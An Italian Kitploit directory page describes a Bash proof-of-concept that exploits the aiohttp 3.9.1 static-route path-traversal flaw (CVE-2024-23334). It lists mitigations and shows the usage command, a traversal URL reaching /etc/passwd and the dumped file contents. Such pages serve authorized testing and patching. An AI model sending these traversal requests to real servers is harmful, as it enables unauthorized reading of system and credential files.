Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
LFI-aiohttp-CVE-2024-23334-PoC — Script Bash per automatizzare gli attacchi di Local File Inclusion (LFI) sul server aiohttp versione 3.9.1. | Kitploit
Strumenti/GitHubGitHub/theredp4nther/lfi-aiohttp-cve-2024-23334-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubtheredp4nther/lfi-aiohttp-cve-2024-23334-poc

LFI-aiohttp-CVE-2024-23334-PoC

Script Bash per automatizzare gli attacchi di Local File Inclusion (LFI) sul server aiohttp versione 3.9.1.

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
21 anno faNon ancora revisionato

LFI-aiohttp-CVE-2024-23334-PoC

Uno script Bash per automatizzare attacchi di Local File Inclusion (LFI) su server aiohttp vulnerabili, mirando specificamente a CVE-2024-23334. Questo exploit consente l'accesso non autorizzato a file arbitrari su sistemi che eseguono versioni affette di aiohttp con rotte statiche configurate in modo improprio.

Vulnerabilità CVE-2024-23334

La vulnerabilità CVE-2024-23334 colpisce il framework asincrono client/server HTTP aiohttp per Python e asyncio. Si manifesta quando aiohttp viene utilizzato come server web con rotte statiche, che possono creare vulnerabilità di directory traversal se configurate in modo errato. Ciò consente a un attaccante di accedere a file arbitrari sul sistema senza autorizzazione.

Mitigazioni per questa vulnerabilità includono:

  • Aggiornare aiohttp alla versione 3.9.2 o successiva, dove il problema è risolto.
  • Disabilitare l'opzione follow_symlinks nella configurazione del server.
  • Utilizzare un reverse proxy per impedire l'accesso diretto a file sensibili.

Funzionalità

  • Automatizza attacchi di directory traversal fino a 15 livelli per raggiungere i file target.
  • Fornisce feedback sulla disponibilità del server e verifica l'avvenuto accesso ai file.
  • Percorsi di payload configurabili per adattare lo script a specifici ambienti di test.

Requisiti

  • curl: assicurati che curl sia installato sul tuo sistema, poiché viene utilizzato per effettuare richieste HTTP.

Utilizzo

Per eseguire lo script, esegui il seguente comando:

./lfi_aiohttp.sh -f /path/to/file/to/dump

Se tutto va bene, dovresti vedere un risultato simile a:

root@kitploit:~
[+] Curl output to the resulting url: http://localhost:8080/assets/../../..//etc/passwd.


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
rosa:x:1000:1000:rosa:/home/rosa:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
app:x:1001:1001:,,,:/home/app:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false

[+] File dumped successfully.

Nota di configurazione

Importante: le variabili main_url e payload nello script potrebbero dover essere modificate a seconda dell'ambiente target.

  • main_url: questa variabile deve essere impostata all'URL del server aiohttp target (ad es., http://localhost:8080). Modificala in base all'indirizzo del server reale contro cui stai effettuando i test.
  • payload: questa variabile rappresenta la rotta dei file statici sul server (ad es., /assets/). Assicurati che questo percorso corrisponda alla configurazione della directory dei file statici del server target.

Prima di eseguire lo script, controlla queste variabili per assicurarti che siano configurate correttamente per il tuo scenario di test. Impostazioni errate potrebbero causare tentativi di accesso falliti ai file o comportamenti indesiderati.

Argomenti

  • -f: specifica il file da estrarre dal server.
  • -h: mostra il pannello di aiuto con le istruzioni di utilizzo.

Dichiarazione di non responsabilità

Questo script è destinato esclusivamente a scopi educativi e a test di penetrazione autorizzati. L'uso non autorizzato di questo script è vietato e potrebbe essere illegale.

Scarica lo strumento